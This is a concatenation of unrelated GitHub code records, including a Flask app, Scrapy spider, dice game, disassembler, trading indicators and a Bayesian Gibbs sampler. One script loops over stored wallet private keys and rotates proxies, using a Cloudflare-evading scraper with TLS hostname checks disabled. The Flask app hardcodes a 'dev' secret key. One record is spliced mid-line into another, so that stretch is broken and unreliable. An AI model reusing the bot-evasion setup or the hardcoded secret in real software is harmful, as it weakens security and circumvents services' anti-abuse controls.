super(MotiFiestaClassifierFineTune).__init__()\n pass\n\n def train(self, train_loader):\n for batch in train_loader:\n pass\n pass\n pass\n\n\nif __name__ == \"__main__\":\n d = 'NCI1'\n f = 'NCI1'\n clf = MotiFiestaClassifierSK(d, dummy=False, sigma_filter='all')\n loaders = get_loader(d, batch_size=8)\n acc = clf.eval_kfold(loaders['dataset_whole'], f'supervised_data/fold-idx/{d}')\n print(acc)\n pass\n","repo_name":"BorgwardtLab/MotiFiesta","sub_path":"MotiFiesta/training/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"39830755972","text":"import os\nimport sys\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\n\n# SQLite URI compatible\nWIN = sys.platform.startswith('win')\nif WIN:\n prefix = 'sqlite:///'\nelse:\n prefix = 'sqlite:////'\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = prefix + os.path.join(app.root_path, 'data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # 关闭对模型修改的监控\napp.config['SECRET_KEY'] = 'dev' # 等同于 app.secret_key = 'dev'\n# 在扩展类实例化前加载配置\ndb = SQLAlchemy(app)\nbootstrap = Bootstrap(app)\nmoment = Moment(app)\n\nlogin_manager = LoginManager(app)\nlogin_manager.login_view = 'login'#重定向到登陆界面,需要是登录函数的名字\nlogin_manager.login_message = 'You are not logged in'\n\n@login_manager.user_loader\ndef load_user(user_id): # 创建用户加载回调函数,接受用户 ID 作为参数\n user = User.query.get(int(user_id)) # 用 ID 作为 User 模型的主键查询对应的用户\n return user # 返回用户对象'\n@app.context_processor\ndef inject_user(): # 函数名可以随意修改\n user = User.query.first()\n return dict(user=user) # 需要返回字典,等同于 return {'user': user}\n\nfrom watchlist import views, errors, commands\nfrom watchlist.models import User, Movie","repo_name":"bdne/Bingdianblog","sub_path":"watchlist/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18537942695","text":"# 미로 탐색 S1\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\nn, m = map(int, input().split())\narr = [list(map(int, input().strip())) for i in range(n)]\ncnt = 0\nvisited = [[False] * m for i in range(n)]\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n\ndef bfs(sx, sy):\n global cnt\n q = deque()\n q.append([sx, sy])\n visited[sx][sy] = True\n\n while q:\n x, y = q.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and not visited[nx][ny]:\n # 범위안에서 방문안한 칸일 때\n if arr[nx][ny] == 1: # 이동할 수 있는 칸디면\n visited[nx][ny] = True\n q.append([nx, ny])\n arr[nx][ny] += arr[x][y] # 이전경로 +1로 갱신\n\n\nbfs(0, 0)\nprint(arr[n - 1][m - 1])\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그래프/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17797633176","text":"#!/usr/bin/python3\n\"\"\" 0x0A. Python - Inheritance, task 13 \"\"\"\n\n\ndef add_attribute(obj, attribute, value):\n \"\"\"Attempts to set or update `attribute` with `value`.\n Args:\n obj (any): object to have attribute set\n attribute (str): name of new/updated attribute\n value (any): value to set to attribute\n Raises:\n TypeError: If adding or updating attribute not possible.\n \"\"\"\n if hasattr(obj, \"__dict__\"):\n # if __dict__ is present, attributes can be dynamically added\n setattr(obj, attribute, value)\n elif hasattr(obj, \"__slots__\") and attribute in obj.__slots__:\n # even if no __dict__, existing attributes in __slots__ can be updated\n setattr(obj, attribute, value)\n else:\n # out of options, can't add\n raise TypeError(\"can't add new attribute\")\n","repo_name":"YASHWANTH1254/volksy-tech-higher_level_programming","sub_path":"python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32431628606","text":"import base64\nimport time\nimport traceback\nfrom datetime import datetime, timezone\nimport ssl\nimport cloudscraper\nimport requests\nimport ua_generator\nimport warnings\n\nimport web3\nfrom eth_account.messages import encode_defunct\nfrom logger import logger\nfrom web3.auto import w3\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nclass Account:\n\n def __init__(self, address, private, proxy):\n\n # print(address)\n self.address, self.private = web3.Web3.to_checksum_address(address), private\n self.session = self._make_scraper\n self.session.proxies = {\"http\": f\"http://{proxy.split(':')[2]}:{proxy.split(':')[3]}@{proxy.split(':')[0]}:{proxy.split(':')[1]}\",\n \"https\": f\"http://{proxy.split(':')[2]}:{proxy.split(':')[3]}@{proxy.split(':')[0]}:{proxy.split(':')[1]}\"}\n adapter = requests.adapters.HTTPAdapter(max_retries=3)\n self.session.mount('http://', adapter)\n self.session.mount('https://', adapter)\n\n self.session.headers.update({\n \"user-agent\": ua_generator.generate().text,\n 'content-type': 'application/json'})\n\n def Authorization(self):\n while True:\n try:\n self.nonce = self._get_nonce\n break\n except:\n traceback.print_exc()\n pass\n\n message = encode_defunct(text=self.nonce)\n signed_message = w3.eth.account.sign_message(message, private_key=self.private)\n signature = signed_message[\"signature\"].hex()\n\n payload = {\"operationName\":\"Authenticate\",\n \"variables\":\n {\"request\":\n {\"address\":self.address,\n \"signature\":signature}},\n \"query\":\"mutation Authenticate($request: SignedAuthChallenge!) {\\n authenticate(request: $request) {\\n accessToken\\n refreshToken\\n __typename\\n }\\n}\"}\n\n with self.session.post('https://api.lens.dev/', json=payload) as response:\n # print(response.text)\n self.session.headers.update({'X-Access-Token': f\"Bearer {response.json()['data']['authenticate']['accessToken']}\"})\n\n payload = {\"operationName\":\"CanClaim\",\"variables\":{},\"query\":\"query CanClaim {\\n claimableHandles {\\n canClaimFreeTextHandle\\n __typename\\n }\\n}\"}\n\n with self.session.post('https://api.lens.dev/', json=payload) as response:\n return response.json()['data']['claimableHandles']['canClaimFreeTextHandle']\n\n\n\n @property\n def _get_message_to_sign(self) -> str:\n\n return f\"waitlist.lens.xyz wants you to sign in with your Ethereum account:\\n{self.address}\\n\\nSign in with Ethereum to the Lens Waitlist app.\\n\\nURI: https://waitlist.lens.xyz\\nVersion: 1\\nChain ID: 137\\nNonce: {self.nonce}\\nIssued At: {datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%fZ')}\"\n\n @property\n def _get_nonce(self) -> str:\n\n payload = {\"operationName\":\"Challenge\",\"variables\":{\"request\":\n {\"address\":self.address}},\"query\":\"query Challenge($request: ChallengeRequest!) {\\n challenge(request: $request) {\\n text\\n __typename\\n }\\n}\"}\n\n with self.session.post('https://api.lens.dev/', json=payload) as response:\n # print(response.text)\n return response.json()['data']['challenge']['text']\n\n\n @property\n def _make_scraper(self):\n ssl_context = ssl.create_default_context()\n ssl_context.set_ciphers(\n \"ECDH-RSA-NULL-SHA:ECDH-RSA-RC4-SHA:ECDH-RSA-DES-CBC3-SHA:ECDH-RSA-AES128-SHA:ECDH-RSA-AES256-SHA:\"\n \"ECDH-ECDSA-NULL-SHA:ECDH-ECDSA-RC4-SHA:ECDH-ECDSA-DES-CBC3-SHA:ECDH-ECDSA-AES128-SHA:\"\n \"ECDH-ECDSA-AES256-SHA:ECDHE-RSA-NULL-SHA:ECDHE-RSA-RC4-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-RSA-AES128-SHA:\"\n \"ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-NULL-SHA:ECDHE-ECDSA-RC4-SHA:ECDHE-ECDSA-DES-CBC3-SHA:\"\n \"ECDHE-ECDSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA:AECDH-NULL-SHA:AECDH-RC4-SHA:AECDH-DES-CBC3-SHA:\"\n \"AECDH-AES128-SHA:AECDH-AES256-SHA\"\n )\n ssl_context.set_ecdh_curve(\"prime256v1\")\n ssl_context.options |= (ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1_3 | ssl.OP_NO_TLSv1)\n ssl_context.check_hostname = False\n\n return cloudscraper.create_scraper(\n debug=False,\n ssl_context=ssl_context\n )\n\n\n\nif __name__ == '__main__':\n\n data_p = []\n data = []\n with open('InputData/AddressPrivate.txt', 'r') as file:\n for i in file:\n data.append(i.rstrip().split(':'))\n\n with open('InputData/Proxies.txt', 'r') as file:\n for i in file:\n data_p.append(i.rstrip())\n\n # mobileProxy =\n # changeIpLink =\n count = 1\n while count List[str]:\n\n words = []\n for q in queries:\n if any(sum(c1 != c2 for c1, c2 in zip(q, d)) <= 2 for d in dictionary):\n words.append(q)\n return words\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"2452.words-within-two-edits-of-dictionary.py","file_name":"2452.words-within-two-edits-of-dictionary.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11072455457","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 17 12:44:54 2019\n\n@author: Aidin\n\"\"\"\nimport numpy as np\nfrom gridWorld import standardGrid\nfrom iterativePolicyEvaluation import printValues, printPolicy\n\n\n\nEPSILON = 1e-5\nGAMMA = 0.9\nACTIONS = {'U','D','L','R'}\n\n\ndef playGame(grid,policy):\n startStates = list(grid.actions.keys())\n startIndex = np.random.choice((len(startStates)))\n grid.setState(startStates[startIndex])\n \n s = grid.currentState()\n statesRewards = [(s,0)]\n while not grid.gameOver():\n a = policy[s]\n r = grid.move(a)\n s = grid.currentState()\n statesRewards.append((s,r))\n G = 0\n statesReturns = []\n firstVisit = True\n for s, r in reversed(statesRewards):\n if firstVisit:\n firstVisit = False\n else:\n statesReturns.append((s,G))\n G = r+ GAMMA*G\n statesReturns.reverse()\n return statesReturns\n\n\nif __name__ == '__main__':\n grid = standardGrid()\n \n \n print (\"Rewards:\")\n printValues(grid.rewards,grid)\n \n policy = {\n (2,0): \"U\",\n (1,0): \"U\",\n (0,0): \"R\",\n (0,1): \"R\",\n (0,2): \"R\",\n (1,2): \"R\",\n (2,1): \"R\",\n (2,2): \"R\",\n (2,3): \"U\",\n }\n \n V = {}\n returns = {}\n states = grid.allStates()\n for s in states:\n if s in grid.actions:\n returns[s] = []\n else:\n V[s] = 0\n \n \n for t in range (100):\n statesReturns = playGame(grid,policy)\n visitedStates = set()\n \n for s , G in statesReturns:\n if s not in visitedStates:\n returns[s].append(G)\n V[s] = np.mean(returns[s])\n visitedStates.add(s)\n \n print(\"Values:\")\n printValues(V,grid)\n \n print(\"Policy:\")\n printPolicy(policy,grid)","repo_name":"AidinFerdowsi/Monte-Carlo","sub_path":"monteCarlo.py","file_name":"monteCarlo.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42133151176","text":"import scrapy\n\n\nclass VnExpressSpider(scrapy.Spider):\n name = \"vnexpress\"\n start_urls = [\n 'https://vnexpress.net/suc-khoe'\n ]\n\n def parse(self, response):\n for href in response.css('section.box_category hgroup a.first'):\n yield response.follow(href, callback=self.parse_posts)\n\n def parse_posts(self, response):\n\n for article in response.css('article.list_news h4.title_news a'):\n yield response.follow(article, callback=self.parse_detail_post)\n\n if response.xpath('//a[@class=\"next\"]/preceding-sibling::a[1]/text()').get() is not \"6\":\n for next_page in response.css('a.next'):\n yield response.follow(next_page, callback=self.parse_posts)\n\n def parse_detail_post(self, response):\n def extract_with_css(query):\n return response.css(query).get(default='').strip()\n\n content = ''\n for p in response.css('p.Normal::text').getall():\n content += p.strip()\n if content != '':\n yield {\n 'time': extract_with_css('span.time.left::text'),\n 'title': extract_with_css('h1.title_news_detail.mb10::text'),\n 'thumbnail': extract_with_css('table tbody tr td img::attr(src)'),\n 'description': extract_with_css('p.description::text'),\n 'content': content,\n 'author': extract_with_css('p.author_mail strong::text')\n }","repo_name":"canhdominich/scrapy","sub_path":"first_project/first_project/spiders/sk_vnexpress.py","file_name":"sk_vnexpress.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16111239723","text":"import argparse\n\nimport numpy as np\nimport open3d as o3d\n\n\ndef main(args):\n\n pcd = o3d.io.read_point_cloud(args.input_file)\n\n points = np.asarray(pcd.points)\n assert len(points) >= args.num_points, \"Too many points to sample.\"\n\n indices = np.random.choice(list(range(len(points))), size=args.num_points, replace=False)\n points = points[indices]\n\n pcd.points = o3d.utility.Vector3dVector(points)\n\n output_file = args.input_file.split(\".\")\n output_file[-2] += \"_downsample\"\n output_file = \".\".join(output_file)\n o3d.io.write_point_cloud(output_file, pcd)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input_file\", type=str)\nparser.add_argument(\"num_points\", type=int)\nargs = parser.parse_args()\nmain(args)\n","repo_name":"ondrejbiza/fewshot","sub_path":"scripts/real_world/viz/subsample_pcd.py","file_name":"subsample_pcd.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14224352667","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Joel Viellepeau\"\n\nfrom tkinter import *\nfrom random import randint\nfrom functools import partial\n\nclass GameYams:\n\n options = ['1', '2', '3', '4', '5', '6', 'x1 Paire', 'x2 Paires', 'Brelan', 'Suite', 'Full', 'Carré', 'Yams']\n points = [1]*6 + [25 + k*5 for k in range(6)] + [100]\n\n def __init__(self, master):\n\n self.master = master\n \n self.choices = {}\n for option in self.options:\n self.choices[option]=False\n \n self.current_turn = 1\n self.throw_this_turn = 0\n\n self.gains = []\n\n self.turn = StringVar()\n self.turn.set(\"Turn #1\")\n\n self.score = StringVar()\n self.score.set(\"Score: 0\")\n\n self.frame_header = Frame(master, width=700)\n\n self.label_score = Label(self.frame_header, textvariable=self.score, font=(\"Courier\", 14, \"bold\"))\n self.label_turn = Label(self.frame_header, textvariable=self.turn, font=(\"Courier\", 14, \"bold\"))\n\n self.button_throw_dices = Button(master, text='Throw dices', fg=\"BLUE\", padx=10, pady=10, command=self.throw_dices)\n\n self.frame_dices = Frame(master)\n self.dice_values = [IntVar(), IntVar(), IntVar(), IntVar(), IntVar()]\n self.dice_labels = [Label(self.frame_dices, textvariable=self.dice_values[i], width=11, borderwidth=2, relief=\"groove\", height=5, justify=CENTER, font=(\"Courier\", 13, \"bold\")) for i in range(5)]\n \n self.dices_selected = [True] *5\n\n self.dices_can_be_clicked = False\n\n for label in self.dice_labels:\n label.bind(\"\", self.toggle_dice_selection)\n\n self.frame_buttons_end_of_turn = Frame(master)\n self.frame_buttons_end_of_turn_left = Frame(self.frame_buttons_end_of_turn)\n self.frame_buttons_end_of_turn_right = Frame(self.frame_buttons_end_of_turn)\n\n self.buttons_choice_end_of_turn = []\n for i, choice in enumerate(self.options[:-1]):\n self.buttons_choice_end_of_turn.append(Button(self.frame_buttons_end_of_turn_left if i < 6 else self.frame_buttons_end_of_turn_right, width=10,text=choice, font=(\"Courier\", 10), command=partial(self.choose_and_start_new_turn, i)))\n\n self.buttons_choice_end_of_turn.append(Button(master, text=\"YAMS!\", width=22, font=(\"Courier\", 10)))\n\n self.init_user_interface()\n\n\n @property\n def dices(self):\n return [self.dice_values[i].get() for i in range(5)]\n \n\n def throw_dices(self):\n self.throw_this_turn += 1\n for i in range(5):\n if self.dices_selected[i]:\n self.dice_values[i].set(randint(1,6))\n self.dice_labels[i].config(fg=\"BLACK\")\n\n self.button_throw_dices.config(state=DISABLED)\n self.dices_can_be_clicked = True\n self.dices_selected = [False]*5\n print(self.dices)\n self.compute_choices()\n\n\n def choose_and_start_new_turn(self, option):\n self.choices[self.options[option]] = None\n self.gains.append(self.points[option])\n self.score.set(\"Score: {}\".format(sum(self.gains)))\n self.current_turn += 1\n self.turn.set(\"Turn #{}\".format(self.current_turn))\n self.init_dices_for_new_turn()\n\n\n def toggle_dice_selection(self, event):\n \n if self.dices_can_be_clicked and self.throw_this_turn < 3:\n\n dice_cliked = [ event.widget == self.dice_labels[i] for i in range(5) ].index(True)\n\n self.dices_selected[dice_cliked] = not self.dices_selected[dice_cliked]\n\n if self.dices_selected[dice_cliked]: event.widget.config(fg=\"BLUE\")\n else: event.widget.config(fg=\"BLACK\")\n\n if True in self.dices_selected: self.button_throw_dices.config(state=NORMAL)\n\n def compute_choices(self):\n\n occurences = [self.dices.count(i) for i in range(1,7)]\n\n if 5 in occurences and self.choices['Yams'] is not None: self.choices['Yams'] = True\n if 4 in occurences and self.choices['Carré'] is not None: self.choices['Carré'] = True\n if 2 in occurences and 3 in occurences and self.choices['Full'] is not None : self.choices['Full'] = True\n if 3 in occurences and 1 in occurences and self.choices['Brelan'] is not None : self.choices['Brelan'] = True\n if occurences.count(2) == 2 and self.choices['x2 Paires'] is not None : self.choices['x2 Paires'] = True\n if occurences.count(2) == 1 and self.choices['x1 Paire'] is not None : self.choices['x1 Paire'] = True\n if occurences.count(1) == 5 and self.choices['Suite'] is not None and (occurences[0]==0 or occurences[-1]==0): self.choices['Suite'] = True\n \n for i in range(6):\n if occurences[i] > 0 and self.choices[str(i+1)] is not None: self.choices[str(i+1)] = True\n\n print(self.choices)\n\n for i, option in enumerate(self.options):\n self.buttons_choice_end_of_turn[i].config(state=NORMAL) if self.choices[option] else self.buttons_choice_end_of_turn[i].config(state=DISABLED)\n\n\n def init_user_interface(self):\n \n self.frame_header.pack(pady=\"20\")\n self.label_score.pack()\n self.label_turn.pack()\n\n self.frame_dices.pack()\n for i in range(5):self.dice_labels[i].pack(side=LEFT)\n\n self.button_throw_dices.pack(pady=10)\n\n self.init_dices_for_new_turn()\n\n self.frame_buttons_end_of_turn.pack()\n self.frame_buttons_end_of_turn_left.pack(side=LEFT)\n self.frame_buttons_end_of_turn_right.pack(side=RIGHT)\n\n\n for button in self.buttons_choice_end_of_turn:\n button.pack(padx=2, pady=1)\n\n def init_dices_for_new_turn(self):\n print(\"\\n{}\".format(self.turn.get()))\n for i in range(5):\n self.dice_values[i].set(0)\n self.dice_labels[i].config(fg=\"BLUE\")\n self.button_throw_dices.config(state=NORMAL)\n self.throw_this_turn = 0\n self.dices_can_be_clicked = False\n self.dices_selected = [True] *5\n\n\nroot = Tk()\nroot.wm_title(\"Jeu de Yams\")\nroot.resizable(width=False, height=False)\napp = GameYams(root)\nroot.mainloop()","repo_name":"joelviel/tkinter-yams","sub_path":"yams.py","file_name":"yams.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37060343801","text":"from dashboard.tradlablib.peakdetect import peakdetect\nfrom dashboard.tradlablib.exec_trade import *\nfrom dashboard.tradlablib.model_train import *\nfrom dashboard.tradlablib import technicalindicator as tind\nfrom dashboard.tradlablib import tradelib\nimport numpy as np\n\nclass KnowSureThingOscillator(object):\n\n def __init__(self, data, tii, ti):\n self.data = data\n self.tii = tii\n self.ti = ti\n\n graphdata = tind.display_indicator(self.data, self.tii.indicator.name, self.tii)\n for pltdt in graphdata:\n if pltdt['name'] == 'KST':\n self.kst=pltdt['y']\n break\n\n \n def trigger(self):\n close = self.data['Close']\n kst = self.kst\n\n signals_trade_buy = []\n signals_trade_sell = []\n\n signal_graph = []\n\n signals = np.zeros(close.shape)\n\n prevsig = 0\n for i in range(1, len(kst)):\n if (kst[i-1] < 0 and kst[i] > 0):\n #sell\n if prevsig != 2:\n signals_trade_sell.append({'x': i, 'y': kst[i]})\n prevsig = 2\n elif kst[i-1] > 0 and kst[i] < 0:\n #overbought end, sell start\n if prevsig != 1:\n signals_trade_buy.append({'x': i, 'y': kst[i]})\n prevsig = 1\n \n signals[i] = prevsig\n\n signal_graph.append({'data': signals_trade_buy, 'type': 'signal-trade-buy', 'name': 'signal-trade-buy', 'id': self.ti.pk})\n signal_graph.append({'data': signals_trade_sell, 'type': 'signal-trade-sell', 'name': 'signal-trade-sell', 'id': self.ti.pk})\n\n traderet = trade_with_signals(self.data, signals)\n\n return signal_graph, signals, traderet\n\n\n def train(self):\n\n cols = []\n params1 = []\n for ii in self.tii.indicator.indicatorinputs.all():\n params1.append(get_input_value(self.tii, ii.parameter))\n cols.append(ii.parameter)\n\n psetb, pret = train_for_kst(self.data, *params1)\n \n graphdata = tind.display_indicator(self.data, self.tii.indicator.name, self.tii, True, *psetb)\n for pltdt in graphdata:\n if pltdt['name'] == 'KST':\n self.kst=pltdt['y']\n break\n\n signal_graph, signals, traderet = self.trigger()\n\n return psetb, pret, signals\n ","repo_name":"macharry89/episectrad","sub_path":"dashboard/tradlablib/libind/indicators/kst.py","file_name":"kst.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44026209092","text":"#!/usr/bin/env python3.3\n\nimport optparse\n\nclass disassembler:\n values = ['a', 'b', 'c', 'x', 'y', 'z', 'i', 'j', '[a]', '[b]', '[c]',\n '[x]', '[y]', '[z]', '[i]', '[j]', '[a+n]', '[b+n]', '[c+n]',\n '[x+n]', '[y+n]', '[z+n]', '[i+n]', '[j+n]', 'pop', '[sp]',\n '[sp+n]', 'sp', 'pc', 'ex', '[n]', 'n'] + \\\n [str(n) for n in range(-1, 31)]\n opcodes = ['spc', 'set', 'add', 'sub', 'mul', 'mli', 'div', 'dvi',\n 'mod', 'mdi', 'and', 'bor', 'xor', 'shr', 'asr', 'shl',\n 'ifb', 'ifc', 'ife', 'ifn', 'ifg', 'ifa', 'ifl', 'ifu',\n 'nul', 'nul', 'adx', 'sbx', 'nul', 'nul', 'sti', 'std']\n spcops = ['nul', 'jsr', 'nul', 'nul', 'nul', 'nul', 'nul', 'nul',\n 'int', 'iag', 'ias', 'rfi', 'iaq', 'nul', 'nul', 'nul',\n 'hwn', 'hwq', 'hwi', 'nul', 'nul', 'nul', 'nul', 'nul',\n 'nul', 'nul', 'nul', 'nul', 'nul', 'nul', 'nul', 'nul']\n \n def __init__(self, data=None):\n if isinstance(data, str):\n self.words = self.loadfile(data)\n elif isinstance(data, list):\n self.words = data\n elif data != None:\n raise TypeError('Expected string or list')\n self.it = worditer(self.words)\n\n def loadfile(self, file):\n with open(file, 'rb') as f:\n b = list(f.read())\n return [b[i] * 256 + b[i + 1] for i in range(0, len(b), 2)]\n\n def hexval(self, val, length=4):\n r = hex(val)\n return '0x' + (length + 2 - len(r)) * '0' + r[2:]\n\n def getinstruction(self, it=None):\n if it == None:\n it = self.it\n def getarg(val, a=True):\n if a:\n val = val >> 10\n else:\n val = (val >> 5) & 0x1f\n if val == 24: return 'push'\n return self.values[val]\n special = False\n out = ''\n l = 0\n try:\n n = next(it)\n out = self.opcodes[n & 31]\n if out == 'spc':\n out = self.spcops[(n >> 5) & 31]\n if out != 'nul':\n out += ' ' + getarg(n)\n special = True\n if out == 'nul':\n out = 'dat ' + self.hexval(n)\n elif not special:\n out += ' ' + getarg(n, False) + ', ' + getarg(n)\n while 'n' in out[4:]:\n i = out.rfind('n')\n out = out[:i] + self.hexval(next(it, 0)) + out[i+1:]\n out += ' ' * (40 - len(out)) + ';' + self.hexval(it.c) + ': '\n lastwords = it.getlastwords()\n l = len(lastwords)\n out += ', '.join([self.hexval(x) for x in lastwords])\n except StopIteration:\n pass\n return (out, l)\n get = getinstruction\n\n def disassemble(self):\n it = worditer(self.words)\n getnext = lambda: self.getinstruction(it)[0]\n n = getnext()\n out = []\n while n != '':\n if n.startswith('dat'):\n o = n\n t = n[:10]\n c = 0\n while n.startswith(t):\n c += 1\n n = getnext()\n if c > 1:\n out.append('.fill ' + str(c) + ' ' + t[4:])\n else:\n out.append(o)\n else:\n out.append(n)\n n = getnext()\n return out\n go = disassemble\n\n\nclass worditer:\n def __init__(self, words):\n self.setwords(words)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.a += 1\n if self.a >= self.l:\n raise StopIteration\n return self.words[self.a]\n\n def back(self, n=1):\n self.a -= n\n return self\n\n def setpos(self, pos):\n self.a = self.c = pos\n return self\n\n def setwords(self, words):\n self.words = words\n self.a = -1\n self.c = 0\n self.l = len(self.words)\n return self\n\n def getlastwords(self):\n tmp = self.words[self.c:self.a + 1]\n self.c = self.a + 1\n return tmp\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n options, args = parser.parse_args()\n\n if len(args) == 1:\n infile = args[0]\n tmp = infile.rfind('.')\n outfile = (infile[:tmp] if tmp != -1 else infile) + '.dasm'\n elif len(args) == 0:\n infile = input('Enter input file: ')\n outfile = input('Enter output file: ')\n if outfile == '':\n tmp = infile.rfind('.')\n outfile = (infile[:tmp] if tmp != -1 else infile) + '.dasm'\n else:\n infile = args[0]\n outfile = args[1]\n\n d = disassembler(infile)\n try:\n with open(outfile, 'w') as f:\n for line in d.disassemble():\n f.write(line + '\\n')\n except IOError:\n print('Couldn\\'t access file: ' + outfile)\n","repo_name":"Lucus16/Chaotic-Assembler","sub_path":"dis/disassembler.py","file_name":"disassembler.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10340985369","text":"from typing import List, Mapping, Optional, Tuple\n\nimport aesara\nimport aesara.tensor as at\nfrom aesara.graph.basic import Variable\nfrom aesara.graph.rewriting.basic import in2out\nfrom aesara.graph.rewriting.db import LocalGroupDB\nfrom aesara.graph.rewriting.unify import eval_if_etuple\nfrom aesara.ifelse import ifelse\nfrom aesara.tensor.math import Dot\nfrom aesara.tensor.random import RandomStream\nfrom aesara.tensor.random.basic import BernoulliRV, NegBinomialRV, NormalRV\nfrom aesara.tensor.var import TensorVariable\nfrom etuples import etuple, etuplize\nfrom unification import unify, var\n\nfrom aemcmc.dists import (\n multivariate_normal_cong2017,\n multivariate_normal_rue2005,\n polyagamma,\n)\nfrom aemcmc.rewriting import sampler_finder, sampler_finder_db\nfrom aemcmc.types import SamplingStep\nfrom aemcmc.utils import remove_constants\n\ngibbs_db = LocalGroupDB(apply_all_rewrites=True)\ngibbs_db.name = \"gibbs_db\"\n\n\ndef normal_regression_overdetermined_posterior(\n srng: RandomStream,\n omega: TensorVariable,\n lmbdatau_inv: TensorVariable,\n X: TensorVariable,\n z: TensorVariable,\n) -> TensorVariable:\n \"\"\"Sample from the posterior of a normal prior and normal observation model.\n\n This version handles ``X.shape[1] <= X.shape[0]``.\n\n See `update_beta` for a description of the parameters and return value.\n\n \"\"\"\n Q = X.T @ (omega[:, None] * X)\n indices = at.arange(Q.shape[1])\n Q = at.subtensor.set_subtensor(\n Q[indices, indices],\n at.diag(Q) + lmbdatau_inv,\n )\n return multivariate_normal_rue2005(srng, X.T @ (omega * z), Q)\n\n\ndef normal_regression_underdetermined_posterior(\n srng: RandomStream,\n omega: TensorVariable,\n lmbdatau_inv: TensorVariable,\n X: TensorVariable,\n z: TensorVariable,\n) -> TensorVariable:\n \"\"\"Sample from the posterior of a normal prior and normal observation model.\n\n This version handles ``X.shape[1] > X.shape[0]``.\n\n See `update_beta` for a description of the parameters and return value.\n\n \"\"\"\n return multivariate_normal_cong2017(srng, lmbdatau_inv, omega, X, z)\n\n\ndef normal_regression_posterior(\n srng: RandomStream,\n omega: TensorVariable,\n lmbdatau_inv: TensorVariable,\n X: TensorVariable,\n z: TensorVariable,\n) -> TensorVariable:\n r\"\"\"Sample from the posterior of a normal prior and normal observation model.\n\n .. math::\n\n \\begin{align*}\n Z &\\sim \\operatorname{N}\\left( X \\beta, \\Omega^{-1} \\right) \\\\\n \\beta &\\sim \\operatorname{N}\\left( 0, \\tau^2 \\Lambda \\right)\n \\end{align*}\n\n where :math:`X \\in \\mathbb{R}^{n \\times p}`,\n :math:`\\Lambda = \\operatorname{diag}\\left(\\lambda^2_1, \\dots, \\lambda^2_p\\right)`, and\n :math:`\\Omega^{-1} = \\operatorname{diag}\\left(\\omega_1, \\dots, \\omega_n\\right)`.\n\n The posterior distribution of :math:`\\beta` is given by\n\n .. math::\n\n \\begin{align*}\n \\left( \\beta \\mid Z = z \\right) &\\sim\n \\operatorname{N}\\left( A^{-1} X^{\\top} \\Omega z, A^{-1} \\right) \\\\\n A &= X^{\\top} X + \\Lambda^{-1}_{*} \\\\\n \\Lambda_{*} &= \\tau^2 \\Lambda\n \\end{align*}\n\n This function chooses the best sampler for :math:`\\beta \\mid z` based on\n the dimensions of :math:`X`.\n\n Parameters\n ----------\n srng\n The random number generator used to draw samples.\n omega\n The observation model diagonal std. dev. values :math:`\\omega_i`.\n In other words, :math:`\\operatorname{diag}\\left(\\Omega\\right)`.\n lmbdatau_inv\n The inverse :math:`beta` std. dev. values :math:`\\tau^{-1} \\lambda^{-1}_i`.\n In other words, :math:`\\operatorname{diag}\\left(\\Lambda^{-1/2}_{*}\\right)`.\n X\n Regression matrix :math:`X`.\n z\n Observed values :math:`z \\sim Z`.\n\n\n Returns\n -------\n A sample from :math:`\\beta \\mid z`.\n\n \"\"\"\n beta_posterior = ifelse(\n X.shape[1] > X.shape[0],\n normal_regression_underdetermined_posterior(srng, omega, lmbdatau_inv, X, z),\n normal_regression_overdetermined_posterior(srng, omega, lmbdatau_inv, X, z),\n )\n\n return 